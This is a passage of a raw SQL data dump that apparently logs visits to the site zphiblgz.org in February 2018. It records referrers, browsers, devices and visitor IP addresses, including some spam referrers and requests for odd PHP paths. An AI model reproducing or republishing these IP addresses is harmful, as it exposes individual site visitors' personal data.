known','Unknown','Unknown','','173.252.98.116','000',1,0),(18960,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.201','000',1,0),(18961,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.216','000',1,0),(18962,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.116','000',1,0),(18963,'2018-02-03','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','54.221.163.238','000',2,0),(18964,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.214','000',1,0),(18965,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.215','000',1,0),(18966,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.214','000',2,0),(18967,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.27','000',1,0),(18968,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.200','000',1,0),(18969,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.118','000',1,0),(18970,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.213','000',1,0),(18971,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.167','000',1,0),(18972,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.124','000',2,0),(18973,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.121','000',1,0),(18974,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.119','000',1,0),(18975,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.129','000',2,0),(18976,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.148','000',1,0),(18977,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.177','000',1,0),(18978,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.86','000',1,0),(18979,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.88','000',1,0),(18980,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.59','000',1,0),(18981,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.117','000',2,0),(18982,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.137','000',2,0),(18983,'2018-02-03','http://www.zphiblgz.org','Unknown','Unknown','Unknown','','138.197.64.43','000',19,0),(18984,'2018-02-03','https://zphiblgz.org','Firefox','Windows','40.1','','109.67.122.185','000',2,0),(18985,'2018-02-03','http://site.ru','Chrome','Windows','5.0.375.99','','185.98.7.102','000',2,0),(18986,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.230','000',1,0),(18987,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.197','000',1,0),(18988,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.91','000',2,0),(18989,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.222','000',1,0),(18990,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.7','000',1,0),(18991,'2018-02-03','https://zphiblgz.org','Firefox','Windows','50.0','','192.187.101.170','000',2,0),(18992,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',1,0),(18993,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.181','000',1,0),(18994,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.215','000',1,0),(18995,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.186','000',1,0),(18996,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.131','000',1,0),(18997,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.222','000',1,0),(18998,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.122','000',1,0),(18999,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.119','000',1,0),(19000,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.208','000',1,0),(19001,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.31','000',1,0),(19002,'2018-02-03','https://outlook.live.com/','Chrome','iPad','64.0.3282.112','','100.14.170.156','000',1,0),(19003,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.23','000',1,0),(19004,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.15','000',2,0),(19005,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.206','000',1,0),(19006,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.228','000',1,0),(19007,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.209','000',1,0),(19008,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.208','000',1,0),(19009,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.206','000',1,0),(19010,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.200','000',2,0),(19011,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.207','000',1,0),(19012,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.238','000',3,0),(19013,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.30','000',1,0),(19014,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.211','000',1,0),(19015,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.241','000',1,0),(19016,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.202','000',1,0),(19017,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.119','000',1,0),(19018,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.57','000',1,0),(19019,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.18','000',1,0),(19020,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.231','000',1,0),(19021,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.73','000',1,0),(19022,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.122','000',1,0),(19023,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.85','000',3,0),(19024,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.28','000',1,0),(19025,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.28','000',1,0),(19026,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.106','000',2,0),(19027,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.26','000',1,0),(19028,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.16','000',1,0),(19029,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.217','000',1,0),(19030,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.212','000',2,0),(19031,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.150','000',1,0),(19032,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.1','000',1,0),(19033,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.230','000',1,0),(19034,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.85','000',1,0),(19035,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.198','000',1,0),(19036,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.123','000',1,0),(19037,'2018-02-03','https://zphiblgz.org','Safari','iPhone','9.0','','113.128.104.208','000',1,0),(19038,'2018-02-03','https://zphiblgz.org','Safari','iPhone','9.0','','222.172.197.121','000',1,0),(19039,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.117','000',2,0),(19040,'2018-02-03','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.43','000',1,0),(19041,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.234','000',3,0),(19042,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.17','000',1,0),(19043,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.119','000',1,0),(19044,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.22','000',1,0),(19045,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.7','000',1,0),(19046,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.113','000',1,0),(19047,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.140','000',3,0),(19048,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.187','000',1,0),(19049,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.34','000',2,0),(19050,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.161','000',2,0),(19051,'2018-02-04','http://zphiblgz.org/logo_img.php','Chrome','Windows','42.0.2311.152','','195.154.187.58','000',1,0),(19052,'2018-02-04','https://zphiblgz.org','Firefox','Windows','57.0','','192.198.80.227','000',1,0),(19053,'2018-02-04','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','100.36.90.41','000',3,0),(19054,'2018-02-04','http://m.facebook.com','Safari','iPhone','11.0','','66.220.151.177','000',1,0),(19055,'2018-02-04','https://zphiblgz.org/event/5th-annual-denim-pearlz-party/','Safari','iPhone','11.0','','66.220.151.178','000',1,0),(19056,'2018-02-04','http://m.facebook.com','AppleWebKit','iPhone','604.4.7','','71.175.59.4','000',1,0),(19057,'2018-02-04','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','74.103.79.128','000',1,0),(19058,'2018-02-04','http://m.facebook.com','AppleWebKit','iPhone','604.4.7','','69.132.221.137','000',1,0),(19059,'2018-02-04','http://site.ru','Chrome','Windows','5.0.375.99','','198.154.249.85','000',5,0),(19060,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.220','000',2,0),(19061,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.116','000',1,0),(19062,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.22','000',1,0),(19063,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.84','000',1,0),(19064,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.193','000',1,0),(19065,'2018-02-04','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','173.73.100.230','000',1,0),(19066,'2018-02-04','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.130.127','000',2,0),(19067,'2018-02-04','http://m.facebook.com','AppleWebKit','iPhone','604.4.7','','71.121.203.89','000',1,0),(19068,'2018-02-04','http://m.facebook.com','AppleWebKit','iPhone','604.4.7','','24.59.63.210','000',1,0),(19069,'2018-02-04','http://m.facebook.com','AppleWebKit','iPhone','604.4.7','','100.15.4.65','000',1,0),(19070,'2018-02-04','http://m.facebook.com','AppleWebKit','iPhone','604.4.7','','97.86.254.250','000',1,0),(19071,'2018-02-04','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.4','000',1,0),(19072,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.231','000',1,0),(19073,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.118','000',2,0),(19074,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.224','000',1,0),(19075,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.110','000',2,0),(19076,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.56','000',3,0),(19077,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.100','000',4,0),(19078,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.59','000',1,0),(19079,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.19','000',2,0),(19080,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','23.224.41.51','000',1,0),(19081,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','192.138.189.160','000',1,0),(19082,'2018-02-04','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',1,0),(19083,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','184.168.193.151','000',1,0),(19084,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','50.63.197.202','000',1,0),(19085,'2018-02-04','http://zphiblgz.org/wp-content/wp-caches.php','Chrome','Windows','42.0.2311.152','','195.154.168.130','000',1,0),(19086,'2018-02-04','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','108.31.146.236','000',4,0),(19087,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.186','000',2,0),(19088,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.16','000',1,0),(19089,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.152','000',2,0),(19090,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.131','000',1,0),(19091,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.168','000',1,0),(19092,'2018-02-04','http://m.facebook.com','AppleWebKit','iPhone','604.4.7','','97.88.163.119','000',1,0),(19093,'2018-02-04','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','108.56.183.103','000',1,0),(19094,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.118','000',3,0),(19095,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.22','000',1,0),(19096,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.89','000',1,0),(19097,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.85','000',1,0),(19098,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.75','000',2,0),(19099,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.86','000',1,0),(19100,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.211','000',1,0),(19101,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.197','000',2,0),(19102,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.167','000',3,0),(19103,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.113','000',1,0),(19104,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.214','000',1,0),(19105,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.149','000',1,0),(19106,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.227','000',2,0),(19107,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.19','000',1,0),(19108,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.59','000',2,0),(19109,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.179','000',3,0),(19110,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.249','000',3,0),(19111,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.193','000',1,0),(19112,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.202','000',2,0),(19113,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.23','000',1,0),(19114,'2018-02-04','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.29','000',2,0),(19115,'2018-02-04','https://m.facebook.com/','Safari','iPhone','11.0','','108.45.154.76','000',2,0),(19116,'2018-02-04','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.29','000',1,0),(19117,'2018-02-04','https://zphiblgz.org','Firefox','Windows','40.1','','93.146.194.162','000',2,0),(19118,'2018-02-04','https://zphiblgz.org','Firefox','Macintosh','57.0','','73.134.159.197','000',3,0),(19119,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.145','000',2,0),(19120,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.83','000',2,0),(19121,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.210','000',1,0),(19122,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.212','000',1,0),(19123,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.182','000',2,0),(19124,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.177','000',1,0),(19125,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.97','000',5,0),(19126,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.128','000',1,0),(19127,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.184','000',1,0),(19128,'2018-02-04','https://zphiblgz.org','Firefox','Windows','40.1','','59.152.59.25','000',2,0),(19129,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.112','000',2,0),(19130,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.194','000',2,0),(19131,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.115','000',4,0),(19132,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.66','000',1,0),(19133,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.210','000',1,0),(19134,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.164','000',1,0),(19135,'2018-02-04','https://zphiblgz.org/scholarship/','Firefox','Windows','57.0','','198.51.197.42','000',1,0),(19136,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.71','000',2,0),(19137,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.78','000',2,0),(19138,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.115','000',1,0),(19139,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.81','000',1,0),(19140,'2018-02-04','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','73.201.181.17','000',2,0),(19141,'2018-02-04','http://m.facebook.com/','Chrome','Android','59.0.3071.125','','99.203.16.106','000',4,0),(19142,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.123','000',2,0),(19143,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.144','000',1,0),(19144,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.178','000',1,0),(19145,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.252','000',3,0),(19146,'2018-02-04','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','96.244.204.170','000',1,0),(19147,'2018-02-04','https://www.google.com/','Safari','iPhone','11.0','','68.134.61.12','000',4,0),(19148,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.28','000',1,0),(19149,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.21','000',1,0),(19150,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.14','000',1,0),(19151,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.81','000',1,0),(19152,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.9','000',1,0),(19153,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.233','000',1,0),(19154,'2018-02-04','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.30','000',1,0),(19155,'2018-02-04','https://zphiblgz.org','Opera','Windows','8.50','','78.88.176.52','000',4,0),(19156,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.115','000',2,0),(19157,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.195','000',2,0),(19158,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.82','000',2,0),(19159,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.21','000',1,0),(19160,'2018-02-04','https://zphiblgz.org','Chrome','Windows','57.0.2987.133','','104.215.89.177','000',2,0),(19161,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.33','000',1,0),(19162,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.138','000',1,0),(19163,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.181','000',2,0),(19164,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.2','000',1,0),(19165,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.194','000',1,0),(19166,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.211','000',2,0),(19167,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.51','000',1,0),(19168,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.208','000',1,0),(19169,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.196','000',1,0),(19170,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.119','000',1,0),(19171,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.86','000',2,0),(19172,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.60','000',2,0),(19173,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.117','000',3,0),(19174,'2018-02-04','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',23,0),(19175,'2018-02-04','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.79','000',1,0),(19176,'2018-02-04','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(19177,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.203','000',4,0),(19178,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.55','000',1,0),(19179,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.112','000',1,0),(19180,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.248','000',4,0),(19181,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.129','000',2,0),(19182,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.149','000',3,0),(19183,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.176','000',1,0),(19184,'2018-02-04','http://m.facebook.com','AppleWebKit','iPhone','604.5.6','','68.117.135.87','000',1,0),(19185,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.25','000',1,0),(19186,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.87','000',2,0),(19187,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.20','000',1,0),(19188,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.119','000',1,0),(19189,'2018-02-04','https://zphiblgz.org','Firefox','Windows','40.1','','175.142.165.222','000',2,0),(19190,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.196','000',1,0),(19191,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.236','000',1,0),(19192,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.84','000',2,0),(19193,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.68','000',1,0),(19194,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.170','000',1,0),(19195,'2018-02-04','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.32','000',1,0),(19196,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.28','000',1,0),(19197,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.231','000',2,0),(19198,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.245','000',2,0),(19199,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.119','000',1,0),(19200,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.180','000',1,0),(19201,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.160','000',2,0),(19202,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.142','000',1,0),(19203,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.6','000',1,0),(19204,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.147','000',2,0),(19205,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.216','000',1,0),(19206,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.205','000',1,0),(19207,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.67','000',1,0),(19208,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.50','000',1,0),(19209,'2018-02-04','https://www.google.com/','Chrome','Android','56.0.2924.87','','96.244.50.179','000',4,0),(19210,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.12','000',1,0),(19211,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.10','000',3,0),(19212,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.116','000',1,0),(19213,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.204','000',1,0),(19214,'2018-02-04','https://www.google.com/url?q=https://zphiblgz.org/scholarship/application/&source=gmail&ust=1517868369369000&usg=AFQjCNHm6ZEOShwAkmpasKj2VvO3V1Y8MA&sa=D','Safari','iPhone','11.0','','96.244.50.179','000',2,0),(19215,'2018-02-04','http://m.facebook.com','AppleWebKit','iPhone','603.1.30','','69.161.83.36','000',1,0),(19216,'2018-02-04','http://zphiblgz.org/','MSIE','Windows','6.0','','117.242.103.126','000',2,0),(19217,'2018-02-04','https://zphiblgz.org','Chrome','Macintosh','14.0.835.202','','208.80.194.31','000',1,0),(19218,'2018-02-04','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.31','000',1,0),(19219,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.21','000',2,0),(19220,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.30','000',1,0),(19221,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.13','000',2,0),(19222,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.122','000',2,0),(19223,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.113','000',1,0),(19224,'2018-02-04','https://zphiblgz.org/scholarship/recommendation/','Safari','iPad','11.0','','68.134.9.53','000',3,0),(19225,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.116','000',1,0),(19226,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.96','000',2,0),(19227,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.176','000',1,0),(19228,'2018-02-04','https://l.facebook.com/','Chrome','Windows','63.0.3239.132','','72.66.100.37','000',1,0),(19229,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.114','000',1,0),(19230,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.64','000',1,0),(19231,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.71','000',1,0),(19232,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.102','000',1,0),(19233,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.160','000',1,0),(19234,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.101','000',1,0),(19235,'2018-02-04','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(19236,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.87','000',4,0),(19237,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.70','000',1,0),(19238,'2018-02-04','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.220','000',1